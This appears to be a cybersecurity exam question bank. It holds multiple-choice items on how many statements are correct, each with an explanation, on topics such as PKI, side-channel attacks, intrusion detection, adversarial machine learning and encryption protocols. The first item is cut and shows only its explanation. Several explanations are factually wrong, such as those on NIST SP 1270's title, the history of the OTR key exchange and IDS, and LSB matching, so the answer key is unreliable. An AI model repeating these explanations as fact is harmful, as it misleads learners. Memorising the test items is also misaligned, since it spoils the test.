Explanation: Statement 1 is correct. Statement 2 is correct. Statement 3 is correct. All three statements are correct: The Noise Protocol Framework is a modular library used by protocols like WireGuard and WhatsApp to establish secure communication channels; PGP, created by Phil Zimmermann in 1991, utilizes a decentralized 'web of trust' where users sign each other's public keys to verify identities; and AES-256-GCM is an industry-standard authenticated encryption mode that ensures both the secrecy of the message (confidentiality) and protection against tampering (authenticity) in modern messaging apps.

Consider the following statements regarding Zero Trust Architecture: 1. Micro-segmentation involves dividing network security into distinct zones, and the implementation of this technique is associated with the OSI model's physical layer protocols. 2. The Jericho Forum, established in 2004, introduced the concept of 'de-perimeterization' which functions as the primary technical framework for the NIST 800-207 standard. 3. The concept of 'Identity as the new perimeter' originated from the 2010 Forrester Research report by John Kindervag, which proposed the initial model for cloud-based firewall integration. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is incorrect. Statement 2 is incorrect. Statement 3 is incorrect. Statement 1 is incorrect because micro-segmentation operates primarily at the application and network layers (Layer 3-7) of the OSI model, not the physical layer. Statement 2 is incorrect because while the Jericho Forum's 'de-perimeterization' influenced the philosophy of Zero Trust, it is not the primary technical framework for NIST 800-207, which is a standalone standard developed by the National Institute of Standards and Technology. Statement 3 is incorrect because, although John Kindervag coined the term 'Zero Trust' in his 2010 Forrester report, the concept focuses on 'never trust, always verify' rather than being a model specifically for cloud-based firewall integration.

Consider the following statements regarding Steganography detection techniques: 1. Digital watermarking is a subset of steganography that focuses on the imperceptible modification of media, and it is governed by the 1996 WIPO Copyright Treaty to prevent unauthorized detection of hidden metadata. 2. The visual attack method for steganography detection relies on the analysis of the Bit Plane Slicing technique, which identifies hidden data by isolating the most significant bit plane of a 24-bit color image. 3. Steganographic capacity is defined by the Kerckhoffs' principle, which posits that the security of the hidden message relies on the secrecy of the algorithm rather than the secrecy of the key. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is incorrect. Statement 2 is incorrect. Statement 3 is incorrect. Statement 1 is incorrect because digital watermarking focuses on copyright protection and robustness rather than hidden communication, and it is not governed by the 1996 WIPO Treaty for the purpose of hiding metadata. Statement 2 is incorrect because visual attacks and Bit Plane Slicing rely on analyzing the Least Significant Bit (LSB) plane, as the Most Significant Bit (MSB) contains the primary image data and would cause visible distortion if altered. Statement 3 is incorrect because Kerckhoffs' principle states that a system should be secure even if everything about the system, except the key, is public knowledge; it does not define steganographic capacity, which refers to the maximum amount of data that can be embedded without causing detectable statistical anomalies.

Consider the following statements regarding Air-gapped Network Security: 1. Air-gapped networks often utilize data diodes for unidirectional information flow, a technology that was first standardized by the Common Criteria for Information Technology Security Evaluation in 1999. 2. The TEMPEST standard, developed by the NSA in 1972, provides for the shielding of electromagnetic emanations to prevent data leakage from air-gapped systems, and it is currently governed by the ISO/IEC 27001 certification process. 3. The concept of the 'Air-Gap' was formally integrated into the 2004 Federal Information Security Management Act, which provides for the classification of critical infrastructure as disconnected nodes. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is incorrect. Statement 2 is incorrect. Statement 3 is incorrect. All three statements are incorrect because they contain historical and technical inaccuracies. Data diodes were not standardized by the Common Criteria in 1999, TEMPEST is a set of standards for preventing electromagnetic spying rather than an ISO/IEC 27001 certification, and the 2004 Federal Information Security Management Act (FISMA) does not formally integrate or define the concept of 'Air-Gap' for critical infrastructure. Air-gapping is a security measure involving physical isolation from unsecured networks, and these specific regulatory and historical claims do not align with established cybersecurity frameworks.

Consider the following statements regarding Adversarial Machine Learning in Cybersecurity: 1. The 2019 adversarial patch technique, which involves placing a localized image pattern on an object, functions by disrupting the global pixel distribution of the input to bypass deep learning object detectors. 2. The 2020 C&W (Carlini & Wagner) attack, known for its effectiveness against defensive distillation, operates by solving a constrained optimization problem that focuses on maximizing the L-0 distance between the original and adversarial images. 3. Model Inversion Attacks, as described in the 2015 Fredrikson et al. research, leverage the output layer's softmax probabilities to recover sensitive training data from models trained on high-dimensional genomic sequences. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is incorrect. Statement 2 is incorrect. Statement 3 is incorrect. Statement 1 is incorrect because adversarial patches function by creating localized noise that overrides features within a specific region, rather than disrupting the global pixel distribution. Statement 2 is incorrect as the C&W attack minimizes, rather than maximizes, the L-p distance (including L-0, L-2, and L-infinity) to ensure the adversarial perturbation remains imperceptible. Statement 3 is incorrect because, while Fredrikson's 2015 research involved model inversion, it primarily targeted simpler models like decision trees and regression models to recover facial images, not high-dimensional genomic sequences via softmax probabilities.

Consider the following statements regarding Biometric template protection: 1. The General Data Protection Regulation (GDPR) Article 9, which came into force in 2018, classifies biometric data as special category data and permits the storage of raw biometric images if they are converted into a 128-bit hash. 2. The NIST Special Publication 800-53, updated in 2020, covers the implementation of biometric template protection and establishes the requirement for using RSA-2048 encryption for all local template storage. 3. Cancelable biometrics involves the intentional distortion of biometric features using a non-invertible transform, such that the original template cannot be reconstructed from the stored data. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 3 is correct. Statement 1 is incorrect. Statement 2 is incorrect. Statement 3 is correct because cancelable biometrics use non-invertible transforms to ensure that if a database is compromised, the original biometric data cannot be reconstructed, allowing for the revocation and reissue of templates. Statement 1 is incorrect because GDPR Article 9 classifies biometric data as special category data but does not mandate or permit the storage of raw images via 128-bit hashing; instead, it emphasizes data minimization and strict processing conditions. Statement 2 is incorrect because NIST SP 800-53 focuses on security and privacy controls for information systems and does not mandate RSA-2048 encryption for local biometric template storage, as such templates are typically protected using irreversible cryptographic hashes or secure enclaves rather than asymmetric encryption.

Consider the following statements regarding Software Bill of Materials: 1. The OWASP Dependency-Track platform integrates with the Common Platform Enumeration (CPE) database to generate automated legal compliance reports for software procurement departments. 2. NIST Special Publication 800-161 Revision 1 provides guidance on supply chain risk management and identifies the Software Bill of Materials as the primary tool for identifying unauthorized developer access. 3. The CycloneDX standard, which reached version 1.5 in 2023, serves as a lightweight SBOM specification designed for security context and supply chain component analysis. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 3 is correct. Statement 1 is incorrect. Statement 2 is incorrect. Statement 3 is correct as CycloneDX 1.5, released in 2023, is a widely adopted, lightweight SBOM standard optimized for security analysis and supply chain transparency. Statement 1 is incorrect because while OWASP Dependency-Track uses SBOMs for vulnerability management, it integrates with the National Vulnerability Database (NVD) via CVEs, not the CPE database for legal compliance. Statement 2 is incorrect because NIST SP 800-161 Rev. 1 focuses on supply chain risk management (SCRM) and identifies SBOMs as a tool for transparency and vulnerability tracking, not as a mechanism for detecting unauthorized developer access.

Consider the following statements regarding Public Key Infrastructure vulnerabilities: 1. The Certificate Transparency (CT) framework logs issued certificates in public append-only ledgers to detect mis-issuance, and the Google Chrome browser maintains a local database of these logs to verify certificate authenticity during the initial TLS handshake process. 2. In 2011, the Dutch Certificate Authority DigiNotar filed for bankruptcy after a security breach resulted in the fraudulent issuance of over 500 rogue SSL certificates, including those for domain names associated with Google. 3. The SHA-256 hashing algorithm is used to generate digital signatures for X.509 certificates, and the NIST SP 800-57 recommendation provides guidelines for key management lifecycles, including the automatic expiration of root certificates after a ten-year interval. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 2 is correct. Statement 1 is incorrect. Statement 3 is incorrect. Statement 2 is correct as the 2011 DigiNotar breach led to the fraudulent issuance of over 500 certificates, causing the CA's collapse. Statement 1 is incorrect because while CT logs are public, browsers do not maintain a local database of all logs for handshake verification; instead, they verify the presence of Signed Certificate Timestamps (SCTs) within the certificate itself. Statement 3 is incorrect because NIST SP 800-57 provides key management guidelines, but it does not mandate a fixed ten-year automatic expiration for root certificates, as root certificate lifespans are typically determined by organizational policy and security requirements.

Consider the following statements regarding Advanced Persistent Threats Detection: 1. APT groups frequently employ Domain Generation Algorithms (DGA) to facilitate command-and-control communication, making it difficult for static blacklists to block malicious traffic. 2. Indicator of Compromise (IoC) databases often track file hashes, such as SHA-256 signatures, to identify known APT-related binaries circulating within enterprise networks. 3. The Diamond Model of Intrusion Analysis, introduced in 2013, links four core features-adversary, capability, infrastructure, and victim-to map the operational structure of an APT campaign. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is correct. Statement 2 is correct. Statement 3 is correct. All three statements are correct: DGA allows APTs to dynamically generate domain names, rendering static IP or domain blacklists ineffective; IoC databases rely on cryptographic hashes like SHA-256 to uniquely identify malicious files; and the Diamond Model, developed by Caltagirone et al. in 2013, provides a formal framework for mapping the relationships between the adversary, capability, infrastructure, and victim to understand the lifecycle of an intrusion.

Consider the following statements regarding Blockchain-based Identity Management: 1. The eIDAS Regulation, adopted by the European Parliament in 2014, establishes the legal framework for the European Blockchain Services Infrastructure and provides for the automatic recognition of DIDs across all member states. 2. Self-Sovereign Identity (SSI) models utilize the DID Document, which contains public keys and service endpoints, to enable authentication without a central identity provider. 3. The W3C Decentralized Identifiers (DIDs) v1.0 specification reached W3C Recommendation status on July 19, 2022, providing a framework for verifiable digital identities. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 2 is correct. Statement 3 is correct. Statement 1 is incorrect. Statement 1 is incorrect because the 2014 eIDAS Regulation focused on electronic identification and trust services for electronic transactions, whereas the European Blockchain Services Infrastructure (EBSI) was launched later in 2018 and is governed by different frameworks. Statement 2 is correct as SSI leverages DID Documents-stored on distributed ledgers-to allow users to authenticate themselves directly using public keys without relying on a centralized authority. Statement 3 is correct because the W3C officially standardized the DID v1.0 specification on July 19, 2022, establishing a global, interoperable standard for decentralized digital identifiers.

Consider the following statements regarding Homomorphic Encryption: 1. Homomorphic encryption allows for the decryption of data by a third-party cloud provider, provided the provider holds the public key generated by the Gentry-Halevi algorithm. 2. The TFHE library, first released in 2015, supports gate-by-gate bootstrapping and provides a framework for multi-party computation using the RSA-2048 encryption standard. 3. The BGV scheme, developed in 2011, focuses on leveled homomorphic encryption and utilizes the Learning With Errors problem to achieve quantum resistance in symmetric key protocols. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is incorrect. Statement 2 is incorrect. Statement 3 is incorrect. Statement 1 is incorrect because homomorphic encryption is specifically designed to perform computations on encrypted data without ever requiring decryption by the cloud provider. Statement 2 is incorrect as TFHE (Torus Fully Homomorphic Encryption) is based on lattice-based cryptography, not RSA-2048, which is an asymmetric standard unsuitable for homomorphic operations. Statement 3 is incorrect because while the BGV scheme (2011) uses the Learning With Errors (LWE) problem, it is a lattice-based scheme designed for public-key encryption, not symmetric key protocols.

Consider the following statements regarding Software Bill of Materials: 1. The CISA 'SBOM-a-rama' workshops held in 2022 focused on the standardization of binary analysis techniques to ensure that software vendors provide full source code access to end-users. 2. The Software Transparency Initiative, launched by the Linux Foundation in 2019, coordinates the global distribution of SBOM metadata through a centralized blockchain ledger to prevent unauthorized software modifications. 3. The Common Vulnerabilities and Exposures (CVE) system serves as the foundational data structure for SBOMs, providing a standardized taxonomy for tracking the origin of third-party software dependencies. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is incorrect. Statement 2 is incorrect. Statement 3 is incorrect. All three statements are incorrect because SBOMs are intended to list software components and dependencies, not to provide source code access (which is proprietary), nor do they rely on a centralized blockchain ledger or the CVE system as their foundational data structure. Specifically, CISA's SBOM initiatives focus on transparency and supply chain security rather than binary analysis for source code disclosure, the Linux Foundation's efforts (like SPDX) promote open standards rather than a centralized blockchain, and the CVE system is a database for vulnerabilities, whereas SBOMs utilize standards like CycloneDX or SPDX to track component inventory.

Consider the following statements regarding Network Intrusion Detection Systems: 1. The 2003 NIST Special Publication 800-94 provides guidelines for intrusion detection, and it categorizes NIDS as being capable of decrypting end-to-end encrypted TLS 1.3 traffic for packet inspection without requiring external key management. 2. Signature-based Intrusion Detection Systems (IDS) rely on a pre-compiled database of known attack patterns, often referred to as 'attack signatures', to identify malicious traffic. 3. The 1980 Anderson Report, commissioned by the U.S. Air Force, introduced the foundational concept of 'Computer Security Threat Monitoring and Surveillance', which led to the first commercial deployment of a signature-based IDS in 1984. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 2 is correct. Statement 1 is incorrect. Statement 3 is incorrect. Statement 2 is correct as signature-based IDS functions by comparing network traffic against a database of known threat patterns, similar to antivirus software. Statement 1 is incorrect because NIST SP 800-94 does not claim NIDS can decrypt TLS 1.3 traffic without external key management; TLS 1.3 is specifically designed to prevent such passive interception. Statement 3 is incorrect because while the 1980 Anderson Report is the foundational document for intrusion detection, the first commercial IDS (Intrusion Detection Expert System - IDES) was developed by SRI International later, and the first commercial product, 'Haystack', was not deployed until 1987.

Consider the following statements regarding Zero-day vulnerability exploitation: 1. The Common Vulnerabilities and Exposures (CVE) system, managed by the MITRE Corporation, assigns unique identifiers to publicly known cybersecurity vulnerabilities after they have been disclosed. 2. The Stuxnet worm, discovered in 2010, utilized four distinct zero-day vulnerabilities in the Windows operating system to target industrial control systems. 3. A zero-day vulnerability refers to a security flaw in software or hardware that is unknown to the vendor, leaving them with zero days to create a patch before it is exploited. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is correct. Statement 2 is correct. Statement 3 is correct. The CVE system, maintained by MITRE, serves as the industry standard for tracking publicly disclosed vulnerabilities, while the 2010 Stuxnet attack is historically significant for being the first to weaponize four distinct zero-day exploits against industrial control systems. A zero-day vulnerability is defined by the lack of prior knowledge by the vendor, meaning the developer has had zero days to address the flaw before it becomes a target for exploitation. All three statements are factually accurate, as they correctly describe the tracking mechanism, a landmark historical case study, and the fundamental definition of the term.

Consider the following statements regarding Cross-Site Scripting Mitigation: 1. The X-XSS-Protection header, introduced by Google Chrome in 2008, functions by validating the server-side input against a predefined regex pattern to prevent reflected script injection. 2. The W3C's Subresource Integrity (SRI) standard, finalized in 2016, allows browsers to verify that fetched resources match a cryptographic hash, which effectively blocks all forms of DOM-based Cross-Site Scripting. 3. The Content Security Policy (CSP) Level 2 specification, published by the W3C in 2016, introduced the 'script-src' directive to restrict the sources from which scripts can be loaded. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 3 is correct. Statement 1 is incorrect. Statement 2 is incorrect. Statement 3 is correct because CSP Level 2 (2016) introduced the 'script-src' directive to mitigate XSS by restricting valid script sources. Statement 1 is incorrect because the X-XSS-Protection header was a browser-side heuristic filter, not a server-side regex validator, and it has been deprecated due to security bypasses. Statement 2 is incorrect because while SRI (2016) prevents tampering with third-party resources, it does not block all DOM-based XSS, as that often originates from the application's own legitimate, yet vulnerable, client-side code.

Consider the following statements regarding Cloud-native security posture management: 1. Cloud Workload Protection Platforms (CWPP) focus on the runtime security of containers and serverless functions, and the 2018 GDPR amendment includes specific provisions for the mandatory deployment of CWPP in European financial institutions. 2. The Shared Responsibility Model, as defined by major providers like AWS and Azure, places the burden of configuring network security groups and identity access management policies on the customer. 3. The Open Web Application Security Project (OWASP) Top 10 for Cloud, released in 2021, categorizes insecure interfaces and APIs as the leading cause of data breaches, which the ISO/IEC 27001 standard classifies as a physical security violation. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 2 is correct. Statement 1 is incorrect. Statement 3 is incorrect. Statement 2 is correct because the Shared Responsibility Model mandates that cloud customers are responsible for configuring security groups and IAM policies, while providers secure the underlying infrastructure. Statement 1 is incorrect as the 2018 GDPR does not mandate specific technical tools like CWPP for financial institutions. Statement 3 is incorrect because while OWASP identifies insecure APIs as a top risk, ISO/IEC 27001 classifies these as logical or application-level security issues, not physical security violations.

Consider the following statements regarding Side-Channel Attacks: 1. Cold boot attacks involve the physical retrieval of encryption keys from DRAM modules after a system power-down, a process facilitated by the residual charge in capacitors that was first described in the 2008 paper by researchers from Princeton University regarding the RSA-4096 algorithm. 2. The Heartbleed vulnerability, discovered in 2014, allows for the extraction of private keys from memory by exploiting a buffer over-read in the OpenSSL library during the TLS handshake phase of a hardware-based side-channel attack. 3. Electromagnetic side-channel analysis captures unintentional radio frequency emissions from computer monitors, a technique standardized under the TEMPEST program established by the United States Department of Defense in 1951 to secure AES-256 communications. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is incorrect. Statement 2 is incorrect. Statement 3 is incorrect. Statement 1 is incorrect because while cold boot attacks exploit DRAM remanence, the 2008 Princeton research focused on general encryption keys, not specifically RSA-4096. Statement 2 is incorrect because Heartbleed is a software-based buffer over-read vulnerability in OpenSSL, not a hardware-based side-channel attack. Statement 3 is incorrect because TEMPEST was established to mitigate electromagnetic emanations for general information security, not specifically to secure AES-256, which did not exist until 2001.

Consider the following statements regarding Advanced Persistent Threats Detection: 1. The 2010 Stuxnet incident is widely documented as a landmark APT operation that utilized four zero-day vulnerabilities to target industrial control systems. 2. Sandboxing technology allows for the execution of suspicious code in an isolated environment, and the 2017 WannaCry outbreak was successfully mitigated by the global deployment of automated sandbox-based hardware firewalls. 3. User and Entity Behavior Analytics (UEBA) systems establish a baseline of normal network activity to detect deviations, often utilizing machine learning algorithms like Isolation Forests. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is correct. Statement 3 is correct. Statement 2 is incorrect. Statement 1 is correct as Stuxnet, discovered in 2010, famously exploited four zero-day vulnerabilities to sabotage Iran's nuclear centrifuges. Statement 3 is correct because UEBA leverages machine learning models, such as Isolation Forests, to identify anomalies by comparing real-time behavior against established baselines. Statement 2 is incorrect because, while sandboxing is a valid security tool, the 2017 WannaCry ransomware spread rapidly via the EternalBlue exploit and was not mitigated by sandbox-based firewalls, but rather by the discovery of a 'kill switch' domain and subsequent emergency patching.

Consider the following statements regarding Public Key Infrastructure vulnerabilities: 1. The X.509 standard, which defines the format for public key certificates, specifies that the serial number field within a certificate is a unique integer assigned by the Certificate Authority to distinguish it from other certificates issued by that same entity. 2. The Diffie-Hellman key exchange protocol allows two parties to establish a shared secret over an insecure channel, and the FIPS 140-3 publication outlines the specific hardware security module requirements for storing root keys in government-issued certificates. 3. The Domain Validation (DV) process involves verifying the requester's control over a specific domain, and the CA/Browser Forum Baseline Requirements specify that Extended Validation (EV) certificates provide a higher level of encryption strength than standard organization-validated certificates. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is correct. Statement 2 is incorrect. Statement 3 is incorrect. Statement 1 is correct because the X.509 standard mandates that a Certificate Authority (CA) must assign a unique positive integer as a serial number to every certificate it issues. Statement 2 is incorrect because while FIPS 140-3 sets standards for cryptographic modules, it does not specifically dictate the storage requirements for root keys in government certificates, which are governed by specific federal policy frameworks like NIST SP 800-57. Statement 3 is incorrect because, while EV certificates involve more rigorous identity verification, they do not provide higher encryption strength; encryption strength is determined by the cipher suites and key lengths negotiated during the TLS handshake, which are identical for DV, OV, and EV certificates.

Consider the following statements regarding Side-Channel Attacks: 1. Cache-timing attacks rely on measuring the time taken to access specific memory locations, allowing an attacker to infer the cache state and potentially reconstruct secret keys used in AES encryption. 2. Acoustic cryptanalysis refers to the method of extracting sensitive information by analyzing the high-frequency sound emissions generated by electronic components like capacitors and inductors during cryptographic operations. 3. The Meltdown vulnerability, identified in 2017, specifically affects out-of-order execution processors and allows unauthorized processes to access kernel memory space. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is correct. Statement 2 is correct. Statement 3 is correct. Statement 1 is correct as cache-timing attacks exploit variations in memory access latency to leak cryptographic keys. Statement 2 is correct because acoustic cryptanalysis measures subtle sound emissions from hardware components like capacitors to derive secret data. Statement 3 is correct as Meltdown, disclosed in 2018 (discovered 2017), exploits speculative execution to bypass memory isolation between user applications and the kernel.

Consider the following statements regarding Quantum Key Distribution: 1. The BB84 protocol, proposed by Charles Bennett and Gilles Brassard in 1984, remains the foundational framework for QKD, utilizing the polarization states of single photons to transmit cryptographic keys. 2. The Defence Research and Development Organisation (DRDO) successfully tested an indigenous QKD system between two secure locations in Hyderabad over a distance of 50 kilometers in December 2020. 3. Quantum Key Distribution networks are inherently different from Post-Quantum Cryptography (PQC), as QKD provides information-theoretic security based on physical laws rather than the computational complexity of mathematical algorithms. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is correct. Statement 2 is correct. Statement 3 is correct. Statement 1 is correct as the BB84 protocol uses the quantum property of photon polarization to ensure secure key exchange. Statement 2 is correct because the DRDO successfully demonstrated this indigenous QKD technology between two labs in Hyderabad over 50 km of optical fiber in December 2020. Statement 3 is correct because QKD relies on the laws of quantum mechanics (like the no-cloning theorem) for security, whereas Post-Quantum Cryptography (PQC) relies on complex mathematical problems that are resistant to quantum computer attacks.

Consider the following statements regarding Network Intrusion Detection Systems: 1. Anomaly-based IDS models establish a baseline of 'normal' network behavior, typically using statistical analysis or machine learning algorithms to detect deviations that may indicate a security breach. 2. Host-based Intrusion Detection Systems (HIDS) operate by monitoring the internal state of a specific computing device, including system call logs and file integrity changes, rather than monitoring the entire network segment. 3. The Snort software, originally developed by Martin Roesch in 1998, functions as an open-source network intrusion detection and prevention system capable of performing real-time traffic analysis. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is correct. Statement 2 is correct. Statement 3 is correct. Statement 1 is correct because anomaly-based IDS uses behavioral baselines to identify deviations from established norms, often leveraging ML for predictive detection. Statement 2 is correct as HIDS focuses on individual host activities like system calls and file integrity, contrasting with NIDS which monitors broader network traffic. Statement 3 is correct because Snort, created by Martin Roesch in 1998, remains a foundational open-source tool for real-time packet sniffing and intrusion prevention.

Consider the following statements regarding Steganography detection techniques: 1. Chi-square steganalysis is a statistical method used to detect LSB embedding by measuring the deviation of the distribution of color pairs from the expected frequency in a cover image. 2. The Least Significant Bit (LSB) matching technique, introduced in academic literature around 1999, involves modifying the last bit of pixel values to hide data while minimizing visual artifacts. 3. The RS (Regular-Singular) steganalysis method, developed by Fridrich in 2001, calculates the pixel correlation coefficient to identify hidden data by measuring the variance in the spatial domain of JPEG images. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is correct. Statement 2 is correct. Statement 3 is incorrect. Statement 1 is correct as Chi-square analysis detects LSB embedding by identifying the statistical imbalance in the frequency of adjacent color pairs (e.g., 2i and 2i+1). Statement 2 is correct because LSB matching (or LSB replacement) became a standard academic benchmark in 1999 for embedding data in the least significant bit of pixel values to remain imperceptible to the human eye. Statement 3 is incorrect because the RS steganalysis method, developed by Fridrich, relies on the classification of pixel groups into Regular, Singular, and Unusable states based on a discrimination function, rather than calculating simple pixel correlation coefficients or spatial variance.

Consider the following statements regarding Hardware Security Modules: 1. The FIPS 140-3 standard, which replaced FIPS 140-2 in 2019, introduces a requirement for all HSMs to incorporate biometric authentication sensors to verify the identity of the system administrator. 2. In cloud environments, Cloud HSM services allow users to maintain control over their encryption keys, with the provider typically offering a dedicated partition that isolates the user's cryptographic operations from other tenants. 3. The Hardware Security Module architecture relies on the AES-256 algorithm for internal key wrapping, and the 2001 NIST publication SP 800-57 provides the technical guidelines for the physical destruction of these modules. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 2 is correct. Statement 1 is incorrect. Statement 3 is incorrect. Statement 2 is correct because Cloud HSMs provide a dedicated, isolated partition for each tenant, ensuring cryptographic keys remain under the user's control rather than the cloud provider's. Statement 1 is incorrect because FIPS 140-3 focuses on enhanced security requirements and testing methodologies, but it does not mandate biometric sensors for administrators. Statement 3 is incorrect because while NIST SP 800-57 provides guidelines for key management, it does not cover the physical destruction of hardware; NIST SP 800-88 is the standard specifically dedicated to media sanitization and destruction.

Consider the following statements regarding Blockchain-based Identity Management: 1. In a blockchain-based identity system, the 'Issuer' signs a Verifiable Credential using their private key, which the 'Holder' then stores in a digital wallet for future presentation. 2. The ISO/IEC 18013-5 standard, published in 2021, defines the technical requirements for mobile driving licenses and integrates the use of Ethereum-based smart contracts for real-time verification of identity attributes. 3. The European Blockchain Services Infrastructure (EBSI) initiative, launched by the European Commission in 2018, incorporates verifiable credentials to facilitate cross-border identity verification. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is correct. Statement 3 is correct. Statement 2 is incorrect. Statement 1 is correct as it accurately describes the decentralized identity model where Issuers sign credentials cryptographically for Holders to manage in digital wallets. Statement 3 is correct because the European Blockchain Services Infrastructure (EBSI), launched in 2018, utilizes W3C-compliant Verifiable Credentials to enable secure, cross-border digital identity verification across EU member states. Statement 2 is incorrect because while ISO/IEC 18013-5 (2021) does define the standard for mobile driving licenses (mDL), it relies on ISO-standardized cryptographic protocols like mdoc rather than Ethereum-based smart contracts for verification.

Consider the following statements regarding Zero-day vulnerability exploitation: 1. The Wassenaar Arrangement, updated in 2013, includes provisions for the export control of intrusion software and surveillance systems that could be used to exploit zero-day vulnerabilities. 2. Zero-click exploits, such as those identified in the Pegasus spyware case, allow for the compromise of a device without any user interaction by leveraging undisclosed vulnerabilities in messaging applications. 3. In 2021, the Microsoft Exchange Server zero-day attacks, attributed to the HAFNIUM group, exploited vulnerabilities categorized under CVE-2021-26855 and three other related flaws. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is correct. Statement 2 is correct. Statement 3 is correct. Statement 1 is correct because the 2013 Wassenaar Arrangement update introduced export controls on 'intrusion software' and surveillance tools to prevent the proliferation of cyber-weapons. Statement 2 is correct as zero-click exploits, like those used by Pegasus, bypass user interaction by triggering vulnerabilities in apps like iMessage or WhatsApp to gain unauthorized access. Statement 3 is correct because the 2021 Microsoft Exchange Server breach involved a chain of four zero-day vulnerabilities (CVE-2021-26855, 26857, 26858, and 27065) widely attributed to the state-sponsored threat actor HAFNIUM.

Consider the following statements regarding Cloud-native security posture management: 1. The NIST SP 800-53 framework, originally published in 2005, provides the foundational architecture for the Zero Trust model and functions as the primary regulatory standard for all private cloud data centers. 2. Cloud Security Posture Management (CSPM) tools utilize the principle of continuous monitoring to identify misconfigurations in cloud environments, such as publicly accessible S3 buckets or unencrypted storage volumes. 3. The MITRE ATT&CK framework for Cloud includes specific tactics for initial access, such as the exploitation of public-facing applications or the abuse of cloud service provider credentials. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 2 is correct. Statement 3 is correct. Statement 1 is incorrect. Statement 1 is incorrect because NIST SP 800-53 provides a catalog of security and privacy controls for federal information systems, not a foundational architecture for Zero Trust, nor is it a mandatory regulatory standard for all private cloud data centers. Statement 2 is correct as CSPM tools are specifically designed to automate the continuous monitoring of cloud environments to detect and remediate common misconfigurations like exposed storage buckets. Statement 3 is correct because the MITRE ATT&CK framework for Cloud explicitly maps adversary behaviors, including the exploitation of public-facing applications and the abuse of cloud service provider credentials, to specific tactical categories.

Consider the following statements regarding Public Key Infrastructure vulnerabilities: 1. Certificate Revocation Lists (CRLs) provide a mechanism for clients to verify certificate status, and the Online Certificate Status Protocol (OCSP) was introduced in RFC 2560 to reduce bandwidth overhead by replacing CRLs in all browser-based validation chains. 2. The RSA cryptosystem relies on the computational difficulty of factoring large prime numbers, and the PKCS#1 v2.1 standard defines the padding schemes used to prevent chosen-ciphertext attacks during key exchange. 3. The Heartbleed vulnerability, identified as CVE-2014-0160, allowed attackers to retrieve private keys from memory by exploiting a missing bounds check in the OpenSSL implementation of the TLS heartbeat extension. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 3 is correct. Statement 1 is incorrect. Statement 2 is incorrect. Statement 3 is correct as the Heartbleed vulnerability (CVE-2014-0160) exploited a missing bounds check in the OpenSSL heartbeat extension, allowing memory exposure. Statement 1 is incorrect because while OCSP reduces bandwidth, it does not replace CRLs in all validation chains; they often coexist as complementary mechanisms. Statement 2 is incorrect because RSA relies on the difficulty of factoring the product of two large prime numbers, not the prime numbers themselves, and PKCS#1 v2.1 focuses on RSA cryptography standards rather than solely preventing chosen-ciphertext attacks.

Consider the following statements regarding Adversarial Machine Learning in Cybersecurity: 1. The Fast Gradient Sign Method (FGSM), introduced in 2014 by Goodfellow et al., generates adversarial examples by calculating the gradient of the loss function with respect to the input data. 2. The 2021 NIST Special Publication 1270, titled 'Towards a Practice of Adversarial Machine Learning', identifies data poisoning as a primary threat vector where malicious training samples are injected to degrade model performance. 3. Project Adversarial Robustness Toolbox (ART), an open-source library hosted by the Linux Foundation since 2018, provides developers with tools to evaluate and defend machine learning models against evasion and poisoning attacks. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is correct. Statement 2 is correct. Statement 3 is correct. Statement 1 is correct as FGSM, proposed by Goodfellow et al. in 2014, creates adversarial perturbations by moving input data in the direction of the loss function's gradient. Statement 2 is correct because NIST SP 1270, published in 2021, explicitly categorizes data poisoning as a major threat where attackers compromise training data to induce model misbehavior. Statement 3 is correct as the Adversarial Robustness Toolbox (ART), hosted by the Linux Foundation, is a widely recognized open-source library specifically designed to help developers implement defenses against evasion, poisoning, extraction, and inference attacks.

Consider the following statements regarding End-to-end encryption protocols: 1. In the context of the Signal Protocol, the X3DH (Extended Triple Diffie-Hellman) key agreement protocol is used to establish a shared secret key between two parties who are not simultaneously online. 2. The Signal Protocol utilizes the Double Ratchet Algorithm to provide forward secrecy and post-compromise security for asynchronous messaging. 3. The OTR (Off-the-Record) Messaging protocol, introduced in 2004, incorporates the Perfect Forward Secrecy mechanism and utilizes the RSA-4096 algorithm for its primary key exchange process. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is correct. Statement 2 is correct. Statement 3 is incorrect. Statement 1 is correct because X3DH allows asynchronous key agreement by using pre-keys stored on a server, enabling secure communication even when one party is offline. Statement 2 is correct as the Double Ratchet Algorithm derives new keys for every message, ensuring both forward secrecy and post-compromise security (self-healing). Statement 3 is incorrect because OTR primarily utilizes the Diffie-Hellman key exchange (specifically the Socialist Millionaire Protocol) rather than RSA-4096 for its primary key exchange process.

